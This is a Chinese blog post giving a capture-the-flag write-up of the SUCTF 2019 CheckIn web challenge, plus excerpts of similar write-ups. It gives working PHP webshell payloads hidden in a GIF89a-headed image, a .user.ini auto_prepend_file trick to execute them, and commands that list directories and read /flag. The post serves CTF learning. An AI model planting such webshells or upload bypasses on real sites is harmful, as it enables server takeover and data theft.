BUUCTF [SUCTF 2019]CheckIn 1

最新推荐文章于 2024-01-25 14:58:56 发布
最新推荐文章于 2024-01-25 14:58:56 发布
阅读量834 收藏 4
点赞数 4
分类专栏: ctf buuctf 刷题日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45642610/article/details/112741593
版权

BUUCTF [SUCTF 2019]CheckIn 1

在这里插入图片描述
文件包含,一句话木马上传。
直接上传一句话木马<?php eval($_POST['a']);?>
在这里插入图片描述
在这里插入图片描述
非法后缀
那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp
都试试,都不行。
这时候可以用图片上传。
在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入

GIF89a
<script language=php>eval($_POST['a']);</script>

因为就算是png,jpg等图片类型,还会检查文件内容头,所以用GIF89a
在这里插入图片描述
用script是因为过滤了<?
![在这里插入图片描述](https://img-blog.csdnimg.cn/2021011714232512.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY0MjYxMA==,size_16,color_FFFFFF,t_70
改后缀名为png,上传
(如果随便用一个图片在命令提示符里输入copy xx.png/b + xx.php/a script_a.png再上传script_a.png会报<?错,因为图片转码后含有<?用burp抓包可见)

在这里插入图片描述

your dir....是你上传在后台的目录路径
your file是该目录下有什么文件,有index.php 和 12.png
试试用蚁剑连接buuoj.cn/uploads/261fb642ce1427b99b76a1627f2a8907/12.png
连不上(why?)。试试用网页post,不行。因为绝大多数web服务器,都不允许静态文件响应POST请求。
在这里插入图片描述

这时index.php就有用了。
当服务器给后台返回php页面时,会按照一个php设置规定来返回页面
在这里插入图片描述
.user.ini可以在客户端规定这个设置。当我们访问index.php时,这个index.php会自动包含.user.ini,而我们设置这个配置文件,就可以插入后门或其他操作。具体参考user.ini文件构成的PHP后门
新建txt,输入

GIF89a
auto_prepend_file=12.png

改后缀名为.user.ini
在这里插入图片描述
在这里插入图片描述
访问.buuoj.cn/uploads/261fb642ce1427b99b76a1627f2a8907/index.php
让index.php包含12.png,用蚁剑连接。
在这里插入图片描述
或者在网页上posta=var_dump(scandir("/"));
在这里插入图片描述然后posta=var_dump(file_get_contents("/flag"));
在这里插入图片描述
或者在12.png里的代码换为

GIF89a
<script language='php'>system('cat /flag');</script>

那么访问index.php时会自动显示flag
在这里插入图片描述
参考
[SUCTF 2019]CheckIn
[SUCTF 2019]CheckIn

Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2564
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1691
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
buuctf-web-[SUCTF 2019]CheckIn1
mlws1900的博客
08-11 641
类似的思路就是index.php把1.jpg进行文件包含,1.jpg里面的内容就以php代码执行,于是getshell。,对GIF89a进行检测(exif_imagetype)这题目环境好像有问题一样,做着做着就自动刷新了上传的马,还好截图快。上传文件,上传一个空的jpg文件,发现not image。exif_imagetype -- 判断一个图像的类型。然后先上传user.ini然后上传jpg文件。文件上传漏洞之user.ini留后门。做一个.user.ini文件。进入根目录找到flag即可。
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1585
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1668
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
BUUCTF闯关日记--[SUCTF 2019]CheckIn1()
qq_64201116的博客
05-18 579
这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势 进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试 1. 发现.htaccess文件传不了 2. 含有 <? 的文件传不了 首先先解决第一个问题: 一.如果.htaccess文件传不了以我现有的知识只有两个方法: 1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀 2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了 但是现有
BUUCTF WEB [SUCTF 2019]CheckIn
A_dmin的博客
12-14 1630
BUUCTF WEB [SUCTF 2019]CheckIn 打开页面是一个上传界面: 而且题目提示给了源码!GitHub上面,看了看还有flag嘞~~ 这不重要,我是来看源码的!!!index.php源码如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8">...
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1160
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
BUUCTF之[SUCTF 2019]CheckIn ---------------------- .user.ini制作后门
weixin_44632787的博客
10-06 355
BUUCTF之[SUCTF 2019]CheckIn ---------------------- .user.ini制作后门 这道题我做过很多遍了,但是好几次都是做不出来。只能一边又一边的跑去看别人的WP。但是随着次数多了,慢慢的就会做了。从一开始不理解到理解,现在我一看到这个题目就能想起接下来的做题步骤了… 还真是应了那两句成语:勤能补拙,熟能生巧。 题目 知识点 一句话木马 .user.ini 文件包含制作后门 .user.ini ...
buuctf WEB checkin1
qq_41696858的博客
09-28 351
这题考的文件上传 经典一句话先试试,回显文件格式不对,把php文件后缀改成jpg格式 第二次回显,显示文件中包含<?,那就把一句话,改成如下形式 <script language='php'>eval($_POST['niaho']);</script> 成功绕过<?匹配,回显不是图片格式,图片头绕过GIF89a 成功上传,下面就是如何上传php文件,或者执行php代码了 经过检测,对于文件类型进行了严格的过滤,改后缀肯定不行 经过检测,可以上传.user.ini文件(
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1294
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
常用的编码(持续更新)
09-17 709
rot ROT5 是 rotate by 5 places 的简写,意思是旋转5个位置,其它皆同。下面分别说说它们的编码方式: ROT5:只对数字进行编码,用当前数字往前数的第5个数字替换当前数字,例如当前为0,编码后变成5,当前为1,编码后变成6,以此类推顺序循环。 ROT13:只对字母进行编码,用当前字母往前数的第13个字母替换当前字母,例如当前为A,编码后变成N,当前为B,编...
[SUCTF 2019]CheckIn 1
qq_43618536的博客
07-03 582
BUUCTF的[SUCTF 2019]CheckIn 1
BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)
m0_73734159的博客
11-28 1979
只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件。绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码。
[SUCTF 2019] Check In 1
c1516175954的博客
03-02 416
[SUCTF 2019]CheckIn1源码审计
[SUCTF 2019]CheckIn1
qq_48932191的博客
01-25 612
上传.user.ini使用auto_pr可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行epend_file=将指定文件包含到当前目录下的php文件前
[SUCTF 2019]CheckIn 1
最新发布
01-12
### SUCTF 2019 CheckIn 题目解析 #### 背景介绍 SUCTF 2019 的 `CheckIn` 是一道 Web 安全题目,主要考察参赛者对于文件上传漏洞的理解以及如何绕过后端的安全检测机制。 #### 文件上传安全检测 在该题目中,服务器使用了 `exif_imagetype()` 函数来验证上传文件是否为合法的图片格式。此函数通过读取文件头部信息中的特定签名来识别图像类型[^3]。然而,这种基于文件头的简单校验方式存在被攻击者利用的可能性。 #### 绕过方法 为了成功提交恶意脚本而不触发上述防护措施,可以采用如下策略: - **修改文件头**:在实际要执行的有效载荷之前附加一段符合目标图片格式标准的数据流。例如,在PHP代码前加入代表JPEG、GIF或PNG格式的魔数(Magic Number),使得即使内容并非真正的图形数据也能顺利通过检验。 具体操作可以在十六进制编辑工具如010Editor里完成,向待上传文件起始处写入相应类型的特征码: - 对于JPG文件应添加 `FF D8 FF E0 00 10 4A 46 49 46` - GIF则需插入字符串 `"GIF89a"` - PNG对应的是序列 `89 50 4E 47` 这样处理后的文件既满足表象上的合法性又暗藏可被执行的指令片段[^2]。 #### 实现过程 创建一个特制的小型Webshell作为测试样本,这里选用了一种常见的单行反序列化命令注入形式,并伪装成GIF图档的形式发送给远程主机。注意去除敏感字符以免引起不必要的过滤拦截。 ```php <?php @eval($_POST['messi']);?> ``` 将其转换为适合传输的状态——即前面提到过的带有虚假图片标识的部分,最终形成完整的payload之后再实施递交动作。一旦部署完毕即可借助客户端发起请求激活隐藏功能获取进一步控制权或者直接读取指定路径下的敏感资料比如 `/flag` 来完成挑战任务[^1]。 ---
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值